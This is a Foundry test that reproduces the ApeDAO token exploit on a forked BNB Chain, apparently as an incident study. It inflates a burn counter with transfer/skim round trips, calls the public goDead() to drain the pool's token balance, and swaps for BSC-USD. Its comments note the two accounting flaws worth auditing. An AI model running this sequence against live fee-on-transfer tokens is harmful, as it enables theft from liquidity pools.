ApeDao事件代码复现
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./interface.sol";
/// @notice Minimal view of the ApeDAO token needed by this reproduction:
///         the ERC-20 surface plus the two token-specific entry points the test calls.
/// @dev Only the signatures are known here; the token's implementation is not shown.
interface IAPEDAO is IERC20 {
    /// @notice Counter the test logs before and after its transfer/skim loop.
    /// @dev NOTE(review): presumably the amount queued for removal by goDead() — confirm against the token source.
    function amountToDead() external view returns (uint256);

    /// @notice Called by the test contract directly, with no privileged caller set up first.
    /// @dev The test logs the pair's token balance on both sides of this call.
    function goDead() external;
}
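/// @title Fork-based reproduction of the ApeDAO incident on BSC.
/// @notice Replays the sequence on a pinned fork and logs the balances that change at each
///         stage, so the accounting flaw can be observed and a fix can be checked against it.
/// @dev Review note (defensive): the sequence below suggests two properties worth auditing in
///      any fee/burn token paired on an AMM — (1) a counter that grows on every transfer into
///      the pair can be inflated by transfer/skim round trips that never trade, and (2) a
///      function anyone may call that changes the pair's token balance outside of a swap moves
///      the pool price without anything being paid into the pool. Both are inferred from the
///      calls and logs in this test; the token source is not shown here — confirm against it.
contract BNOTest is Test {
    // Block the fork is pinned to, so the run is reproducible.
    uint256 private constant FORK_BLOCK = 30072293;
    // Starting apedao balance given to the test contract via deal(); how the balance was
    // obtained in the original incident is not reproduced here.
    uint256 private constant SEED_BALANCE = 2238674491718649997652;
    // Number of transfer/skim round trips performed before goDead() is called.
    uint256 private constant ROUNDS = 16;

    IAPEDAO apedao = IAPEDAO(0xB47955B5B7EAF49C815EBc389850eb576C460092);
    // PancakeSwap V2 router on BSC; used only for the price quote in swap().
    IPancakeRouter pancakeRouter = IPancakeRouter(payable(0x10ED43C718714eb63d5aA57B78B54704E256024E));
    // Pair that holds apedao and BSC-USD liquidity.
    IPancakePair pancakePair = IPancakePair(payable(0xee2a9D05B943C1F33f3920C750Ac88F74D0220c3));
    IERC20 bscusd = IERC20(0x55d398326f99059fF775485246999027B3197955);
    // Foundry cheatcode address.
    CheatCodes cheats = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D);

    /// @notice Forks BSC at FORK_BLOCK and labels the token for readable traces.
    /// @dev Requires an RPC endpoint named "bsc" in the Foundry configuration.
    function setUp() public {
        cheats.createSelectFork("bsc", FORK_BLOCK);
        cheats.label(address(apedao), "apedao");
    }

    /// @notice Replays the incident and logs each intermediate balance.
    /// @dev The test only logs; it contains no assertions, so it passes as long as no call reverts.
    function testExploit() public {
        deal(address(apedao), address(this), SEED_BALANCE);
        emit log_named_decimal_uint("After deal attacker apedao number", apedao.balanceOf(address(this)) , apedao.decimals());
        emit log_named_decimal_uint("Before attack amountToDead number ", apedao.amountToDead() , apedao.decimals());

        // Each round sends the whole balance to the pair and immediately skims it back.
        // No swap happens; the before/after logs show what these round trips do to
        // amountToDead. NOTE(review): presumably the token increments the counter on
        // every transfer whose recipient is the pair — confirm against the token source.
        for (uint256 i = 0; i < ROUNDS; i++) {
            apedao.transfer(address(pancakePair), apedao.balanceOf(address(this)));
            pancakePair.skim(address(this));
        }
        emit log_named_decimal_uint("After attack amountToDead number ", apedao.amountToDead() , apedao.decimals());
        emit log_named_decimal_uint("After attack attacker apedao number", apedao.balanceOf(address(this)) , apedao.decimals());

        // goDead() is called from an ordinary address. The pair's apedao balance is logged
        // on both sides of the call to show its effect on the pool.
        emit log_named_decimal_uint("Before godead pancakePair apedao number ", apedao.balanceOf(address(pancakePair)) , apedao.decimals());
        apedao.goDead();
        emit log_named_decimal_uint("After godead pancakePair apedao number ", apedao.balanceOf(address(pancakePair)) , apedao.decimals());

        swap();
    }

    /// @notice Sells the test contract's remaining apedao for BSC-USD through the pair and logs the proceeds.
    /// @dev Quotes through the router, then calls the pair directly and requests 90% of the quote.
    ///      NOTE(review): the 10% margin presumably absorbs the token's transfer fee — confirm.
    function swap() internal {
        address[] memory path = new address[](2);
        path[0] = address(apedao);
        path[1] = address(bscusd);

        // The quote is assigned directly; the original allocated a two-element array first
        // and then discarded it by overwriting the reference.
        uint256[] memory amounts = pancakeRouter.getAmountsOut(apedao.balanceOf(address(this)), path);

        apedao.transfer(address(pancakePair), apedao.balanceOf(address(this)));
        // The output is requested as amount0Out; BSC-USD's address sorts below apedao's,
        // so it is the token0 side of the pair.
        pancakePair.swap(amounts[1]*90/100, 0, address(this), "");
        emit log_named_decimal_uint("After attack bscusd balance ", bscusd.balanceOf(address(this)) , bscusd.decimals());
    }
}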